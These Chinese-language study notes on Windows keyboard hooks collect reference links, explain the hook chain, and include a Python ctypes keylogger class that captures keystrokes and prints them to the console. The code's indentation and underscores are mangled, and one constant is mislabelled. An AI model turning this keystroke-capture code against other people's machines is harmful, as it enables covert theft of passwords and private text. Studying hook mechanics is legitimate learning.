windows hook原理：

windows hook 原理与实现 https://blog.csdn.net/m0_37552052/article/details/81453591

hook 基本原理 https://blog.csdn.net/qq_36381855/article/details/79962673

《windows核心编程系列》十八谈谈windows钩子 https://blog.csdn.net/fanhenghui/article/details/54138080

windows hook api:

callnexthookex() https://baike.baidu.com/item/CallNextHookEx/3777953?fr=aladdin

C语言windows 键盘Hook：

https://blog.csdn.net/yan_star/article/details/88528631

https://blog.csdn.net/johnny_83/article/details/1701822

https://www.iteye.com/blog/huiytt-1829744

python 使用win32api windows hook ：

https://www.cnblogs.com/megachen/p/9879224.html

ctypes(通过ctypes来调用Win32API, 主要就是调用钩子函数)
SetWindowsHookEx(), 将用户定义的钩子函数添加到钩子链中, 也就是我们的注册钩子函数
UnhookWindowsHookEx(), 卸载钩子函数
CallNextHookEx()在我们的钩子函数中必须调用, 这样才能让程序的传递消息
键盘输入 --> 系统消息队列 --> 对应应用程序的消息队列 --> 将消息发送到对应的窗口中
键盘输入 --> 系统消息队列 --> 对应应用程序消息队列 --> 将消息发送到钩子链中 --> 消息一一调用完毕所有的钩子函数(需要调用CallNextHookEx函数才能将消息传递下去) --> 将消息发送到对应的窗口中
注意:
- 在程序中, 我们通过CFUNCTYPE返回一个类对象, 通过该类对象可以实例化出我们需要的c类型的函数, 但是如果不将他放在全局的话则会失去效果, 因为在C语言中函数是全局的

# -*- coding: utf-8 -*-
import os
import sys
from ctypes import *
from ctypes.wintypes import *

"""
define constants
"""
WH_KEYBOARD = 13
WM_KEYDOWN = 0x0100
CTRL_CODE = 162

class JHKeyLogger(object):

def \_\_init\_\_(self, user32, kernel32):  
    """  
    Description:  
        Init the keylogger object, the property 'hook\_' is the handle to control our hook function

    Args:  
        @(dll)user32: just put windll.user32 here  
        @(dll)kernel32: just put windll.kernel32 here

    Returns:  
        None  
    """  
    self.user32\_ = user32  
    self.kernel32\_ = kernel32  
    self.hook\_ = None

def install\_hookproc(self, hookproc):  
    """  
    Description:  
        install hookproc function into message chain

    Args:  
        @(c type function)hookproc: hookproc is the hook function to call

    Returns:  
        @(bool):  
            if SetWindowHookExA() function works successfully, return True  
            else return False  
    """  
    self.hook\_ = self.user32\_.SetWindowsHookExA(  
                                  WH\_KEYBOARD,  
                                  hookproc,  
                                  self.kernel32\_.GetModuleHandleW(None),  
                                  0)  
    if not self.hook\_:  
        return False  
    return True

def uninstall\_hookproc(self):  
    """  
    Description：  
        uninstall the hookproc function which means pick the hookproc pointer off the message chain  
    Args:  
        None  
    Returns:  
        None  
    """  
    if not self.hook\_:  
        return  
    self.user32\_.UnhookWindowsHookEx(self.hook\_)  
    self.hook\_ = None

def start(self):  
    """  
    Description:  
        start logging, just get the message, the current thread will blocked by the GetMessageA() function

    Args:  
        None  
    Returns:  
        None  
    """  
    msg = MSG()  
    self.user32\_.GetMessageA(msg, 0, 0, 0)

def stop(self):  
    self.uninstall\_hookproc()

def hookproc(nCode, wParam, lParam):
"""
Description:
An user-defined hook function

Attention:  
    here we use the global variable named 'g\_keylogger'  
"""  
if wParam != WM\_KEYDOWN:  
    return g\_keylogger.user32\_.CallNextHookEx(g\_keylogger.hook\_, nCode, wParam, lParam)

pressed\_key = chr(lParam\[0\])  
print pressed\_key,  
# hit ctrl key to stop logging  
if CTRL\_CODE == lParam\[0\]:  
    g\_keylogger.stop()  
    sys.exit(-1)  
return g\_keylogger.user32\_.CallNextHookEx(g\_keylogger.hook\_, nCode, wParam, lParam)